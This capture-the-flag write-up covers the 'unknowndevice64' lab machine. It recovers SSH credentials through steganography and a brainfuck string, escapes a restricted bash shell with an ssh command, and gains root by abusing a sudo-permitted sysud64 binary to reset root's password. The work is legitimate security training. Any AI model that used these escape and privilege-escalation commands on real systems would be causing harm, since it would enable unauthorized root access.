Last updated: 15 Apr 24 09:25:47 (UTC)

Complete Unknowndevice64

Unknowndevice64

By Lawcky 18/02/24

Introduction

Unknowndevice64

Difficulty : medium

Additionnal info :

Name: unknowndevice64: 1
Release date: 9 Mar 2019
Author: Ajay Verma
Series: unknowndevice64

In this write-up

  • Steganography (steghide)
  • rbash escape
  • Privesc using sysud64 binary file

Scans

039648f018af1df0ee36ac21ce94c1bf.png

Write-UP

3dddc4eefa86f0de10b8f51398798a56.png

found in the source code

1878016c5808c3615549f7528dd0919b.png

d0c686759c7affd9a80a0c93c02e0399.png

there are hidden data inside this image

Steganography

after some digging using different tools i understood that the file had a password that was specified in the filename (took some time 😅)

password : h1dd3n

i found brainfuck code :

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

once executed :

ud64:1M!#64@ud

SSH & RBASH

4fdd0a9a0acefce320688f697d5232ea.png

we are stuck in a restricted bash

tried :

ssh -t ud64@192.168.1.189 -p 1337 --norc --noprofile

doesnt work and looks like we cannot execute any binary file/command

worked :

ssh -t ud64@192.168.1.189 -p 1337 "bash --noprofile"

1a0a52632c275c8265079bd6ba0de0d3.png

Privilege Escalation

558679ecd512f2427c1fd8126154878d.png

9ecbfb54d3ef36e905b99ba170c08066.png

seems like we can run commands as other user while also dynamically change the PATH environnement variable

sudo /usr/bin/sysud64 -E /usr/local/sbin=/home/ud64/prog -u root id

be5d8f53b683677582b13cf4bf29b44b.png

the command has been executed and it looks like it printed all the syscalls made for the command,

lets create a command file in tmp and run it as root to try to get a shell

sudo /usr/bin/sysud64 -u root id works as well, but commands like sh or bash

since i just want to get root account lets change the password using this RCE :

at first i tried running the command without any file but it wasnt stable and did not work well so lets use the PATH environnement variable for this one

the binary file for passwd is inside the /bin dir, lets change it to /tmp using the sysud64 command

sudo /usr/bin/sysud64 -u root -E /bin=/tmp

now lets create the passwd file to execute this command :

echo -e "1234\n1234" | passwd

now lets run :

sudo /usr/bin/sysud64 -u root -E /bin=/tmp passwd

e9b6cd7794794377db408b7f777b889a.png

Note : i had to reenter the password in the sysud64 output 3 time for it to work so i dont think the first part of the command worked as expected, anyway it worked

3d702dfe13c5a0f78a3a5f11bc3ca0b3.png

Found the Flag

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.